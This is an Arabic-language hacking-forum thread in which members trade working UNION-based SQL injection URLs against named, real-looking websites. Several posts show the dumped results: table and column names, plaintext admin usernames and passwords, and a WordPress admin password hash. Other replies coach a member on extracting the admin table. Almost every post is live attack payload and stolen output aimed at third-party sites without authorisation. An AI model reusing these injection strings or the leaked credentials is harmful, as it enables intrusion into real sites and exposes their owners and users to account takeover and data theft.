موقع جديد http://www.shopmbtnice.com/article.php?id=-1 عدد الاعمده المصابه 4 UNION SELECT 1,2,3,4 العامود المصاب 4 أصدار القاعده 5 كتبت...

الحالة
مغلق و غير مفتوح للمزيد من الردود.

Masaru

New Member
العدد (4) من غرفة الحقن

عدد الاعمده المصابه 4

PHP:
UNION SELECT 1,2,3,4

العامود المصاب 4

أصدار القاعده 5

كتبت الاستغلال كامل

PHP:
http://www.shopmbtnice.com/article.php?id=-1 UNION SELECT 1,2,3,concat(table_Name,0x3a,column_Name,0x3a,table_schema),5+From+information_schema.columns+Where+column_name+like+CHAR(37, 112, 97, 115, 37)--

طلع لي

PHP:
tb_account:password:shopmbtnice

أضفت على الاستغلال السابق كلمت Group

الناتج

PHP:
tb_account:password:shopmbtnice
tb_email:password:shopmbtnice


أخذت هذي الكلمه (tb_account) وشفرتها في موقع التشفير

وكتبت

PHP:
where+table_Name=0x74625f6163636f756e74

بدل أستعلام جدول الباس

طلع الناتج

PHP:
tb_account:id:shopmbtnice

أنا ألي هنا وقفت ما عرفت أكمل

وأحنى هنا على شان نتعلم من بعض

والي قدر يحقن الموقع يقلي أذا كان عندي خطأ ولا لا

بالتوفيق للجميع
 

aircrack -ng

<img src="http://vbspiders.com/vb/images/rank/team
العدد (4) من غرفة الحقن
الباس =951753

تسلم حبيبي
ع فكرة اللوحة مدفونة

السيرفر تقريبا كله مصاب والمشكلة كلها بلوحة الادمن
واللوحات الموجودة هي لوحات دخول الاعضاء
 

NeTCaT-Ma

New Member
العدد (4) من غرفة الحقن
عدد الاعمده المصابه 4

PHP:
UNION SELECT 1,2,3,4

العامود المصاب 4

أصدار القاعده 5

كتبت الاستغلال كامل

PHP:
http://www.shopmbtnice.com/article.php?id=-1 UNION SELECT 1,2,3,concat(table_Name,0x3a,column_Name,0x3a,table_schema),5+From+information_schema.columns+Where+column_name+like+CHAR(37, 112, 97, 115, 37)--

طلع لي

PHP:
tb_account:password:shopmbtnice

أضفت على الاستغلال السابق كلمت Group

الناتج

PHP:
tb_account:password:shopmbtnice
tb_email:password:shopmbtnice


أخذت هذي الكلمه (tb_account) وشفرتها في موقع التشفير

وكتبت

PHP:
where+table_Name=0x74625f6163636f756e74

بدل أستعلام جدول الباس

طلع الناتج

PHP:
tb_account:id:shopmbtnice

أنا ألي هنا وقفت ما عرفت أكمل

وأحنى هنا على شان نتعلم من بعض

والي قدر يحقن الموقع يقلي أذا كان عندي خطأ ولا لا

بالتوفيق للجميع

أجل صحيح لاكن هدا tb_account جدول الأعضاء
هدا هو جدول الأدمن tb_admin
من بعد ما شفرت ضع أمر group_ ليطلع لك جميع الأعمدة
من بعد ستصبح الحقنة هكدا
http://www.shopmbtnice.com/article....group_concat(name,0x3a,pwd),5+from+tb_admin--
بالتوفيق
 

NeTCaT-Ma

New Member
العدد (4) من غرفة الحقن
عدد الأعمدة 8

اليوزر = WORDandLIFE
الباس =258790

الحقنة الأخيرة
كود:
http://www.wordandlife.org/prayerroom-details.php?id=-632+UNION+SELECT 1,2,3,group_concat(login_username,0x3a,login_password),5,6,7,8+from+login_db--
 
التعديل الأخير:

aircrack -ng

<img src="http://vbspiders.com/vb/images/rank/team
العدد (4) من غرفة الحقن
السلام عليكم

اليوم الموقع الي بحقنه الاقيه الاصدار الرابع ههههههههههههه
جاري البحث عن الاصدار المحبوب لدى الجميع
 

MoJrIm HaCkErS

/[Legend of Maroc]\
العدد (4) من غرفة الحقن
السلام عليكم تم الحقن و لكن ما عرفت افك الهاش لانه مش من نوع md5

الحقنة الاخيرة

PHP:
http://oneworld.cz/ow/2008/pop.php?id=-12662 UNION SELECT 1,2,3,4,5,6,7,8,9,group_concat(user_login,0x3a,user_pass),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54+from+wp_users--


اليوزر
admin
الباس المشفر
$P$BWFi2wzP9trcAZsLcfMMYIqcHhpda80
 
الحالة
مغلق و غير مفتوح للمزيد من الردود.
أعلى